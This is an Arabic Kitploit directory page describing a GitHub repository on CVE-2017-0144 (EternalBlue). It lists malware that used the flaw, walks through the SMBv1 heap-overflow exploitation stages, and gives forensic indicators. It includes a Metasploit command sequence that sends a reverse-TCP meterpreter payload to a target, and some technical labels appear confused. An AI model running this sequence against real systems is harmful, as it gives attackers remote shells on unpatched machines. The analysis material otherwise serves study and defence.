Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
أدوات/GitHubGitHub/firetemple/blackash-cve-2017-0144
تحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةاختبار الاختراقاستخبارات التهديداتكشف التسللالتعلم والتعليمموارد منسقة
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

159منذ 10 أشهرلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🌐 CVE-2017-0144 — EternalBlue: ثغرة تنفيذ التعليمات البرمجية عن بُعد في SMBv1 لنظام Microsoft Windows

EternalBlue

"استغلال واحد. عشرات العائلات الضارة. مليارات في الأضرار."


🔍 ملخص سطر واحد

CVE-2017-0144 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في تطبيق خادم SMBv1 في Microsoft Windows. الاستغلال المعروف باسم EternalBlue استغل هذه الثغرة واستُخدم في هجمات عالية التأثير (أبرزها WannaCry).


🔥 أفضل 10 برمجيات خبيثة استخدمت EternalBlue (تفصيلي)

#البرنامج الخبيثالنوعأول ظهورالجهة الفاعلةالضررملاحظات
1WannaCryبرمجية فدية12 مايو 2017مجموعة Lazarus (كوريا الشمالية)4-8 مليارات دولارمفتاح القتل: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaماسح (تظاهر بأنه فدية)27 يونيو 2017Sandworm (روسيا)10 مليارات دولار+استخدم Mimikatz + EternalBlue + PSEXEC
3Bad Rabbitبرمجية فدية24 أكتوبر 2017Indrik Spiderإقليميهجوم تحميل مزيف لتحديث Flash
4Uiwixبرمجية فديةمايو 2017غير معروفمنخفضلا مفتاح قتل، أكثر خفاءً من WannaCry
5EternalRocksدودةمايو 2017غير معروفمتوسط7 أدوات NSA (بما في ذلك DoublePulsar)
6Adylkuzzعامل تعدين عملات رقميةمايو 2017غير معروفعالي (صامت)قام بتعدين Monero قبل WannaCry
7Retefeحصان طروادة مصرفي2017–2018غير معروفبنوك أوروبيةاستخدم EternalBlue للحركة الجانبية
8TrickBotبرمجيات معيارية خبيثة2017–2021Wizard Spiderعالميأسقط Ryuk عبر EternalBlue
9Emotetمحمل2017–2021TA542عالمياستخدم كمدخل لـ Cobalt Strike
10Clop / Dridexبرمجية فدية2019–2025TA505الرعاية الصحية، الحكومةلا يزال نشطًا في 2025

🧨 تطور استغلال EternalBlue

eternelblue1
الأداةالإصدارالميزات
EternalBlue (الأصلي)أبريل 2017 (Shadow Brokers)RCE عبر SMBv1
DoublePulsarأبريل 2017زرع باب خلفي (ring0)
EternalRomanceأبريل 2017متغير SMBv3
EternalChampionأبريل 2017مسار SMB بديل
وحدة Metasploitمايو 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchأبريل 2017إطار استغلال NSA
Impacket + PSEXEC2017–2025استغلال SMB بلغة Python
eternelblue2

🔍 كيف تم استغلال CVE-2017-0144 (EternalBlue)

غوص تقني خطوة بخطوة في ثغرة RCE في SMBv1

"حزمة واحدة مشوهة. وصول كامل للنظام SYSTEM. لا تسجيل دخول. لا نقرة."


🎯 تدفق الاستغلال باختصار

[المهاجم] 
   │
   ├──▶ يرسل طلب **Trans2** من SMBv1 مصمم خصيصًا
   │       → يسبب **تجاوز سعة الكومة** في `srv!SrvOS2FeaListSizeToNt`
   │
   ├──▶ يكتب فوق مؤشرات الدوال → **كود شيل في النواة**
   │
   └──▶ ينفذ باب خلفي **DoublePulsar** → **حمولة في Ring-0**
           (مثل `mssecsvc.exe` من WannaCry)

🛠️ المتطلبات الأساسية للاستغلال

المتطلبالتفاصيل
الهدفWindows مع تمكين SMBv1 (افتراضي قبل Win10)
المنفذ المفتوح445/TCP (أو 139/TCP عبر NetBIOS)
بدون مصادقةغير مصادق — لا حاجة لاسم مستخدم/كلمة مرور
الهيكلx86 أو x64 (كلاهما مدعوم)
حالة التصحيحغير مصحح (قبل MS17-010)

🚀 مراحل الاستغلال (7 خطوات)

المرحلة 1: التفاوض على بروتوكول SMB

SMB_COM_NEGOTIATE → يرسل العميل قائمة اللهجات
يستجيب الخادم: SMBv1 مدعوم → تابع

السبب؟ يؤكد أن SMBv1 نشط.


المرحلة 2: اتصال الشجرة إلى IPC$

eternelblue3
\\TARGET\IPC$ → مشاركة مجهولة لأنابيب SMB

الغرض: إنشاء جلسة لإرسال طلبات المعاملات.


المرحلة 3: إعداد جلسة Trans2 (أساسي)

  • يستخدم SMB_COM_TRANSACTION2 (0x32)
  • الأمر الفرعي: SESSION_SETUP
  • إعداد بنية FEALIST بحجم مشوه
FEALIST {
    SizeOfListInBytes = 0xFFFF (أو قيمة كبيرة)
    ...
}

تشغيل الخطأ: SrvOS2FeaListSizeToNt() تثق بهذا الحجم دون التحقق من الحدود.


المرحلة 4: طلب Trans2 ثانوي (تجاوز السعة)

  • يرسل حزمًا ثانوية متعددة
  • تحتوي كل منها على FEALIST + FEA (السمات الموسعة للملفات) بحجم زائد
eternelblue4
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → تجاوز السعة للمخزن المؤقت
}

رش الكومة: يخصص كتلًا كبيرة للتحكم في تخطيط الذاكرة.


المرحلة 5: تجاوز سعة المخزن المؤقت في النواة

srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // يتحكم فيه المهاجم
    PULONG pNtFeaListSize  // مؤشر الإخراج
)
{
    // لا يوجد تحقق من FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

النتيجة:

  • تجاوز سعة الكومة → الكتابة فوق كائنات النواة المجاورة
  • الهدف: SRVNET_BUFFER أو POOL_HEADER
  • الكتابة فوق مؤشرات الدوال (مثل روتين Free)

المرحلة 6: تنفيذ كود شيل النواة

  • يتحكم المهاجم في RIP/EIP عبر مؤشر دالة مكتوب فوقه
  • يقفز إلى كود الشيل في التجمع غير القابل للترحيل

يقوم كود الشيل بما يلي:

  1. الانتقال من Ring-0 إلى Ring-3 (عبر KeUserModeCallback)
  2. تخصيص ذاكرة في وضع المستخدم
  3. تنزيل/تحميل الحمولة (مثل mssecsvc.exe)
  4. تثبيت الباب الخلفي DoublePulsar

المرحلة 7: زرع الباب الخلفي DoublePulsar

eternelblue6
  • يحقن برنامج تشغيل النواة (مفتاح XOR 0x00120034)
  • يستمع إلى حزم SMB السحرية:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + الحمولة

مثال WannaCry:

EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → تشفير الملفات

🧨 هيكل حزمة الاستغلال (مبسط)

رأس SMB
└── الأمر: 0x32 (TRANSACTION2)
    └── الإعداد: 0x000E (SESSION_SETUP)
        └── المعامل: TotalDataCount = 0x1000
            └── البيانات: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → رش الكومة
                [OVERFLOW] → الكتابة فوق التجمع
                [SHELLCODE] → x64 ring0

🛠️ أدوات الاستغلال الحقيقية

الأداةاللغةالوحدة
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
C2 مخصصC/C++WannaCry, NotPetya

مثال Metasploit

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 أدلة تحليل الذاكرة الجنائي

الأثرالموقعالقيمة
DoublePulsarذاكرة النواةمفتاح XOR 0x00120034
كود الشيلتجمع srvnet.sysنمط 0xCC 0x90 0x48
DLL المحقونC:\Windows\mssecsvc.exeSHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

تنزيل الأداة